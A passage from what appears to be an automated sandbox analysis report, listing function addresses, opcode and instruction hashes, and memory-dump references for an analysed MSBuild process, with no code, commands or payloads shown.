                                                                                                              • Opcode ID: 0ef8661e073dd78fd8452259e215c5f3460eb1980edf2f036d91045d078280b2
                                                                                                              • Instruction ID: eb4d993b3038ea19d9fbdb666eec9e993c394ac2c7d20264c468bb113ab98dcf
                                                                                                              • Opcode Fuzzy Hash: 0ef8661e073dd78fd8452259e215c5f3460eb1980edf2f036d91045d078280b2
                                                                                                              • Instruction Fuzzy Hash: 3FF024712043419BF710A72D9C81BA3329AE7D075CF65906AEB098B6C2E970DC01C3B4
                                                                                                              Function 013C656A Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5aba7f861ce58773e6aafe7b7b6b8a832278ba5b43a9fdb8e546ea139facacda
                                                                                                              • Instruction ID: 426c831c9b86532458fd20b8c18bdda64bd5889d1593086f329691b147a9327f
                                                                                                              • Opcode Fuzzy Hash: 5aba7f861ce58773e6aafe7b7b6b8a832278ba5b43a9fdb8e546ea139facacda
                                                                                                              • Instruction Fuzzy Hash: 9301A9B1344685DFE3239B6DCD49B2A77D8BB54F48F584169BA018BBE6D778D8028310
                                                                                                              Function 0143437C Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 324f11d04b297b3d0ec6903189942cd5393f6e2d50d6ddbcf8182371fcaaafa2
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: 43F0E93134191347E735AA2E9410BABA6559FD4D50B0D052E9605CB7A0DF30DC118780
                                                                                                              Function 0141E872 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: a8b6ca28d209869cba641091117bcea6d4a73ffe0f7e2b54117052ab77bcc4d9
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 6AF05436B515119FD7229A4EDC80F17B769EFD5A60F590066AE04AB378C770EC4287D0
                                                                                                              Function 0141C89D Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edc1c34301b702b2b1faa30bb49a21e3b94966cbf8daf7f845790015dce5f1f6
                                                                                                              • Instruction ID: b09de80d6ee5a9bafe026415b00c6c6a93967b05aef706688cdf22e5f5a817d4
                                                                                                              • Opcode Fuzzy Hash: edc1c34301b702b2b1faa30bb49a21e3b94966cbf8daf7f845790015dce5f1f6
                                                                                                              • Instruction Fuzzy Hash: 9BF08C716193049FC314EF68C885A1AB7E4EF98714F40465ABC98DB3A4E634E901C796
                                                                                                              Function 013C0854 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 8035d81cc7bcff62c632a8d5706ff006b185e060551ab77a3fc37e9f2a981342
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 9DF09072610204EFE718DB25CC01F96BAEDEF98748F14C068A545E7164EAB0DD01C754
                                                                                                              Function 0141C912 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5dcbc52c5db63eba3b65f9018caf6ccff9317c7ce4313df20f8c525b59aa4227
                                                                                                              • Instruction ID: e62b5ea245285d67820fcd16f544e11ec7dbd625e47796fea96909bbb898ee6a
                                                                                                              • Opcode Fuzzy Hash: 5dcbc52c5db63eba3b65f9018caf6ccff9317c7ce4313df20f8c525b59aa4227
                                                                                                              • Instruction Fuzzy Hash: B6F0C870A00209DFCB04EF69D555A5EB7B4FF14304F008056B805EB395D634DA01CB50
                                                                                                              Function 013947FB Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce30fa39bafb7a8a95b42eabf8a8a7b2f819da16ddbc6c724a8fea4742a5f36b
                                                                                                              • Instruction ID: 4d204b757c1bb0db70a838d2227efd6ea4711b910877463560668d5ad8ce77e8
                                                                                                              • Opcode Fuzzy Hash: ce30fa39bafb7a8a95b42eabf8a8a7b2f819da16ddbc6c724a8fea4742a5f36b
                                                                                                              • Instruction Fuzzy Hash: FCF0B43191E6D59FEF32CB5CC644B217FD89B0063CF088D6AD54D8F512E725D882C651
                                                                                                              Function 01450115 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c14b0fd4244875c6accc6807465c33a23c5febf5e1321ae1ad6e9faab267cb5
                                                                                                              • Instruction ID: 8027e8fee865fc5d5c50b7016da5973dcd68c1dc1ceac1143fe9fe331eb16c58
                                                                                                              • Opcode Fuzzy Hash: 7c14b0fd4244875c6accc6807465c33a23c5febf5e1321ae1ad6e9faab267cb5
                                                                                                              • Instruction Fuzzy Hash: 6AF0276A4156C007DBB26B2C64503DE3B54A762210F0B108FDCA06B33BC5758883C365
                                                                                                              Function 013CC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9f69d32d227da3408a3980a0a6b3af183c218e597ce19b04d3426faf74ac06b
                                                                                                              • Instruction ID: a7a2c1891e7e4d75c837c4337bc84354beaf5ee9ed0dcc1f74f787385f3763eb
                                                                                                              • Opcode Fuzzy Hash: f9f69d32d227da3408a3980a0a6b3af183c218e597ce19b04d3426faf74ac06b
                                                                                                              • Instruction Fuzzy Hash: F6F0BE725116519BE722972CC248B117BD89B40EBCF0CB42ED44A87512C264ECA0CB51
                                                                                                              Function 013D2619 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 21f786a3045e49cf7c9a44ca39b3d1982ff2ef6f86874486a5564d6667248367
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: 26E0D8333006012BE7119E5D9CC0F47776EDFD2B28F044079B6045F251C9E2DD0982A4
                                                                                                              Function 01426030 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 6eac25f78e994ad785151b0594a14c2bfe4aadf029c45fffa864a80593bf97b2
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: FFF030B21042149FE321CF49D944F52B7F8EB05364F96C066EA099B661D37DEC80DBA4
                                                                                                              Function 01390710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 614c186e733e68e704e5912838b2b5115e79fde2accbe622077244a8a10d7f56
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 0AF0E539208355DBEF1ACF29D040A997BECFB51368F040055F8428B351E731E982CB90
                                                                                                              Function 013C49D0 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: 48fe468dd82bce001ff4be44da467dd8277c18dc16ffb613ad01a6c89fb7d586
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: A2E0D836244149ABE3211A5D8810F6677A9DBD1FA4F15042DE2068B550DB70DC40C7D8
                                                                                                              Function 01464164 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7353a610209cfada4f3382cbc5a4b8a8a0b37525b5928551eef8a8ed491c99d
                                                                                                              • Instruction ID: 0b69a3d80c3b4b0a480bce1b0109b27c87dbd9d47242fa582405dc94ed139a31
                                                                                                              • Opcode Fuzzy Hash: a7353a610209cfada4f3382cbc5a4b8a8a0b37525b5928551eef8a8ed491c99d
                                                                                                              • Instruction Fuzzy Hash: CEF0E531A25591CFEF72D76CD548B9377E8EB50638F0E1556D40087A26C330DC80C691
                                                                                                              Function 0143678E Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 6747a7929ea4c72a18af331cc3e47f31665256f05203a3165ae3b57d2e7f77ad
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: E7E0DF32A00110FBDB22A7998D05F9BBEACDB94EA4F460055B601E71A0E630DE00C6A0
                                                                                                              Function 014608C0 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction ID: 1b59c72d0e74b7fa5195ef29d948d367c7efe81775a10908b84be8abac205ca6
                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction Fuzzy Hash: 98E09B316403508BCB25CA1EC140A53B7ECDFE56A8F15806FE90547722C271F842C6D1
                                                                                                              Function 013925E0 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2a6f9f334d39849521e49d539bc5aafd72398c2290e88861d8fa2616407922c1
                                                                                                              • Instruction ID: 6ed4a6c4c89d3959fac31f325e2a81ad3279cc3c4acc1e7a936b5df4225f7a04
                                                                                                              • Opcode Fuzzy Hash: 2a6f9f334d39849521e49d539bc5aafd72398c2290e88861d8fa2616407922c1
                                                                                                              • Instruction Fuzzy Hash: 65E09232100A94ABCB21BB2DDD01F8B77AAEF61368F014519B155571A0CA74AC10C7C4
                                                                                                              Function 0144A456 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: bc38f9569c404e3fba0dffab16ddb7de20a380e953f6111975a35b86cce1fe4d
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 1AE06D31050A11DFEB326B2ED848B97BAA1AF60715F24882DA19B125B0C7B49881CA40
                                                                                                              Function 01414000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: 2a05a89825eb3f0b7cbc85fb83b1300e47774c0526cb8486e67af2600e06d928
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 04E0AE743002058FE715CF1AC050B627BA6BFD5B10F28C069A9488F309EB32E8828A40
                                                                                                              Function 0138823B Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: 92e4da9520dad272faca64ed736ef2dc15db1d8640c34fb5098e605cee88936b
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 5CE0C232400B24EFDB323F19EC00F52B6A5FF54B18F5048A9E0810A4A887B0AC81CB44
                                                                                                              Function 01392050 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53113a53463c4741ba2dd5599d10fe8147a95b2975e21addbd86b6e9aa0f284e
                                                                                                              • Instruction ID: 926e060523efa2490ee382af2889c63e9fc19f2dd36218ecc8cd55e0b6d9a7e6
                                                                                                              • Opcode Fuzzy Hash: 53113a53463c4741ba2dd5599d10fe8147a95b2975e21addbd86b6e9aa0f284e
                                                                                                              • Instruction Fuzzy Hash: 94E0C2321005906BCB11FB5DDD00F4E73AEEFA5374F010125F154976A0CA64AC01C7D4
                                                                                                              Function 013C8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: b7c6c01186823fb92805732d7b8e87b6e72a4ac475cc1bfa9a426584b8518939
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: 7AE08633121A1887D728DE1CD511B7277A8FF45B20F09463EA61347790C534E944C794
                                                                                                              Function 013E6AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction ID: b0bb6d78f5344e4b0efd48e9f32fc5d6ec58cc6a739e0be181f3f7a29ec2fc76
                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction Fuzzy Hash: 69D05E76911A50AFD7329F1FEE04C13FBF9FBD4B10705062EA54583920C670A806CBA0
                                                                                                              Function 013CE59C Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: db6982d8a64af320e65de49786274b5c02c184c01e517f2dbf3139d8ec101f78
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: 81D0A932604620AFDB32AA1DFC00FC373E9BB88724F06086AB008C71A1C370AC81CA84
                                                                                                              Function 0140E908 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: 4f54340e22def90b3e61954f4b2279ab778d864915fd64cd115c03a14e31493e
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: 06E0EC35950684AFDF13DF9ECA40F5ABBB5FB94B40F150468A1086B771C634A910CB40
                                                                                                              Function 0138A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: ee57b071f33fbd115424c5224bd6e6802a60df311dfc0d6306b758a21d17f02e
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 57D02232212030A7CF28675A6C00F63B90AEB80A98F0A002E740A93800C0048C43D2E0
                                                                                                              Function 013CA830 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: 2f616fb09c9facd19ce7d2cb7e03113f8644d0f8cbd306659884dc24b9206ac9
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: D2D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B504875A0C63AE950D584
                                                                                                              Function 013CCA24 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8d7287cf0253a14d65505f3bcb88d43d44e4e233684627ccbcdf1a31dd321c4
                                                                                                              • Instruction ID: f1c5fdbc74c3339bb24eed2945268f51dfe19f22dee6861fff2cf1ce63c803fe
                                                                                                              • Opcode Fuzzy Hash: e8d7287cf0253a14d65505f3bcb88d43d44e4e233684627ccbcdf1a31dd321c4
                                                                                                              • Instruction Fuzzy Hash: A0D05238A010129BEF2BCB0ECA14A3E7AB4EB50A48B85007CEA04A2530E338DC01CB00
                                                                                                              Function 013A02A0 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 65bc0dd7020c970dcd12aeaa9b799d15a3f94fdea4e1aca1682a3bbd1c020afb
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: DFD0C935212E80CFD62BCB0DC5A4B1633A8FB44B48FC10490F501CBB22D62CD940CA00
                                                                                                              Function 013CC700 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
